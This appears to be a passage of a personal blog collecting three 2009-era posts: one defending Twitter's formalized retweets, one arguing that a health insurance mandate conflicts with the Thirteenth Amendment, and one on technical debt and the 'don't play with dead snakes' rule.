  3. There is no commonly understood format for retweeting across Twitter clients. This point is driven home by Dan Zarrella's need to educate everyone on how to retweet. The existence of alternative conventions, such as "via" and "h/t" (hat tip), add additional complexity to the situation. Twitter's formalized retweet system provides the commonality needed to truly harmonize the retweet experience across Twitter clients.
  4. Formalizing retweets by separating metadata from data does not violate the KISS Principle. This is not to say that all metadata must be stripped from tweets. There is room for adding metadata to tweets via conventions like "The Slasher" microsyntax; however, it is important that Twitter formalizes and incorporates all metadata attributes that become popular. The formalization of community-invented metadata attributes allows Twitter to engage in a sort of "backdoor message inflation." That is, incorporating metadata attributes into the Twitter platform leaves more of each 140 character tweet for message content and yet-to-be-invented metadata attributes.

The Twitter Conservatives' movement is a reactionary movement. If Twitter followed their ideology, we would soon see tweets like:

Me too! /time 11:01pm loc 1st Street; New York, NY dev Echofon cc @nathanielmc RT @matthewmarkus I just saw a meteor! /time 11:00pm loc 2nd Avenue; New York, NY dev Web

Twitter's formalized retweet system may fail to meet expectation, but there can be no doubt that now is the time for Twitter to start the process of formalizing the retweet.

Health Care: The public option and compulsory insurance.

"...individuals will be required to carry basic health insurance — just as most states require you to carry auto insurance."
  - President Barack Obama, 9/9/2009

The above analogy does not hold. Most states' compulsory insurance statutes force drivers to obtain insurance as a condition of registering their vehicles and being able to drive.[1] That is, in order to receive a benefit from the state (e.g. be a legal driver), one must transact with a private entity (e.g. buy private insurance). If one does not wish to transact with a private entity, one still has the option of (a) not driving, or (b) self-insuring with a surety bond or other negotiable security.[2] Requiring that individuals carry basic health insurance without any additional reforms sets up a situation in which one must transact with a private entity simply because one exists. This is a very dangerous precedent. In fact, it is tantamount to, and as ridiculous as, mandating that all citizens must legally buy something as frivolous as a MP3 player.

Fortunately, Amendment XIII of the United States Constitution protects individuals from being forced into "involuntary servitude" by the U.S. government or private entities.[3] Here, the term "involuntary servitude" is defined by two essential elements:
 
1.) involuntariness (i.e. being forced to transact with a private insurer for health insurance), and;
2.) servitude (i.e. having your labor pay profits/dividends to the owners of the private insurer).

It should be noted that the term "involuntary servitude" does not apply to "duties which individuals owe to the state, such as services in the army, militia, on the jury, etc."[4] This sets up a clear dichotomy; if we now owe the state a duty of maintaining health insurance, the state must be in the insurance business. That is, there must be a public option. If we don't owe the state said duty, then the status quo must hold and there can be no mandate to buy private insurance. There are no other legal options for Congress to consider.

[1] http://public.findlaw.com/abaflg/flg-11-5b-3.html
[2] http://dor.mo.gov/mvdl/drivers/dlguide/chapter13.pdf
[3] http://www.law.cornell.edu/constitution/constitution.amendmentxiii.html
[4] http://caselaw.lp.findlaw.com/scripts/getcase.pl?court=US&vol=240&inv...

Don't Play with Dead Snakes

In software development there is a concept called TechnicalDebt [1]. This concept relates to the fact that there are two ways of solving a technical problem: a quick-and-dirty way and a clean way. If a software developer chooses the quick-and-dirty way, the developer gets an immediate payoff of advancing through the development process; however, this advancement comes with "interest" payments. The interest, in this case, is the extra effort the developer must expend to deal with the complexities of the quick-and-dirty solution that emerge later in the development process. Most developers dislike TechincalDebt, but, when faced with impending deadlines, they often take on such debt in order to deliver software on time.

The concept of TechnicalDebt is important. What is missing, though, are guidelines on how one can judiciously use TechnicalDebt. To fill this void, and to curb my perfectionistic tendencies, I have recently started to employ a rule that Jim Barksdale introduced to Netscape in 1995 [2]:

"Rule No. 2 is, don't play with dead snakes. When a problem has been solved, or you have taken an approach on something, do not revisit it. Simply move on down the road."

Thus, now, when I encounter a technical problem, I try to solve it in the best possible way (i.e. I try to kill the snake) without going too far (i.e. playing with a dead snake). For some reason, I find this advice very compelling since I don't want the snake to rear its ugly head later in the development process to bite me, but I also don't want to spend large amounts of time overdesigning a generalized solution to a problem that I have already solved.

[1] http://martinfowler.com/bliki/TechnicalDebt.html
[2] http://www.forbes.com/2009/08/05/netscape-venture-capital-intelligent-technol...